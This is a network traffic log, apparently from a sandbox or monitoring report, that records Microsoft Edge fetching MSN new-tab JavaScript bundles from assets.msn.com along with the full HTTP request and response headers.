akamai-request-id: 19b9f4c1
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedHoverShowAbstractModule_js.ce640e09510b3762bde6.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedHoverShowAbstractModule_js.ce640e09510b3762bde6.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: kkafnFNmFj8z3TDqGFUuqg==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF866E2E0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b41d3a24-201e-0046-0e5c-142485000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617300,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f514
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedInfopane24Module_js.0506598e167dfc898a5e.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedInfopane24Module_js.0506598e167dfc898a5e.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: skZTIcPPI8h81M8UKGXWUg==
last-modified: Tue, 20 Dec 2022 23:56:02 GMT
etag: 0x8DAE2E5BFFCDFE2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 018f2c92-101e-00a1-7a36-1ce0fc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617419,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f58b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedInfopaneModule_js.5ca0e6c591f4d1983642.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedInfopaneModule_js.5ca0e6c591f4d1983642.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: NhFBecEqbmcNADdgAYDV0g==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C1481B20
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6ad07a4b-001e-003c-1236-1cd890000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617531,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f5fb
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedNoHoverModule_js.b0a99cc387da61b83d43.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedNoHoverModule_js.b0a99cc387da61b83d43.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ogW4DJru0M2u2DghJ93GRA==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF64D2B3E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 435ae5d3-401e-006c-3644-14bba3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617716,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=32, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f6b4
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedRIS1Module_js.5ec8bb1b06a9d71ae17f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedRIS1Module_js.5ec8bb1b06a9d71ae17f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: jVXRBjuHdADzki9Sieit3w==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6CD9312
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a67185e5-901e-0085-5b5a-14ddc7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617771,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f6eb
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedSafeAdsModule_js.1b05164a35de83093b95.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedSafeAdsModule_js.1b05164a35de83093b95.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: be6UQ/q8Cq99AdC/LKFUgA==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C1FB244F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6ad06259-001e-003c-0636-1cd890000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617842,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f732
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedSmallerFontModule_js.dcf9b498b837aa6ee16a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedSmallerFontModule_js.dcf9b498b837aa6ee16a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: KJM87HGzLg7R3HwXx71BfQ==
last-modified: Tue, 20 Dec 2022 23:56:08 GMT
etag: 0x8DAE2E5C3BB3051
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2802565a-701e-005b-4436-1c4bbc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617923,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f783
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedT1FontModule_js.4e87b77cb99a0ed74fa9.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedT1FontModule_js.4e87b77cb99a0ed74fa9.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: IkvnBoYMV+HTu2if5xV5/A==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF77071FE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ab8b1098-401e-00c4-035a-1425d4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617986,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f7c2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedT2FontModule_js.7c24e87d04f06126af0f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedT2FontModule_js.7c24e87d04f06126af0f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6eJV4p7jKihJ4qz+w+V5Vw==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C11579C5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 280372af-701e-005b-0236-1c4bbc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
akamai-request-bc: [a=88.221.24.111,b=431618061,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f80d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedUnderlineModule_js.d74b9e24a122fbba8b3d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedUnderlineModule_js.d74b9e24a122fbba8b3d.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 93orjMyaPRnkK9x0TR2yOg==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5F8AF04
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ab8b158d-401e-00c4-605a-1425d4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
akamai-request-bc: [a=88.221.24.111,b=431618167,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f877
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedVideoCardModule_js.7546eebbaf9a4a84393e.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedVideoCardModule_js.7546eebbaf9a4a84393e.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: LkNmh8qBxj5q9I1kMD6luA==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C1B1A2F1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 280190ea-701e-005b-3d36-1c4bbc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
akamai-request-bc: [a=88.221.24.111,b=431618239,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f8bf
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedZoomModule_js.0f764344171fcd44eacb.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedZoomModule_js.0f764344171fcd44eacb.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: gOW5ll+WOs5DlDAidPRYsA==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF53A83EB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3466bdf4-b01e-006b-415d-146aad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
akamai-request-bc: [a=88.221.24.111,b=431618353,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f931
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_MsftFeedModule_js.6cba487e9eee9ce678d6.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_MsftFeedModule_js.6cba487e9eee9ce678d6.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: aM5MPCDzVZbHf42jpmCHuw==
last-modified: Fri, 16 Dec 2022 21:57:08 GMT
etag: 0x8DADFB07A25987D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6b9ebc3e-b01e-00d3-150d-1444f8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
akamai-request-bc: [a=88.221.24.111,b=431618485,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f9b5
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-worker.6d3737570e2ef7069bc3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-worker.6d3737570e2ef7069bc3.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: gT5RWMSaCbMRkYVZVE0XHQ==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB078BF110C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a3cf6677-c01e-00e0-73ae-1318ef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
akamai-request-bc: [a=88.221.24.111,b=431618573,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9fa0d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-worker.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: STo8nfMoyE4BPuJIxJpi6Q==
last-modified: Thu, 11 Jun 2020 17:20:36 GMT
etag: 0x8D80E2BC1564999
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 89e1b4a9-001e-003c-1a66-08d890000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
akamai-request-bc: [a=88.221.24.111,b=431618641,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9fa51
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/xbox-feed-wc.104143ac46914673c5f4.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/xbox-feed-wc.104143ac46914673c5f4.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: JOan3p2/ykSKvkiHU/J+bA==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5D9B9D3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 51f9e73e-101e-005d-4c5c-14b1b0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
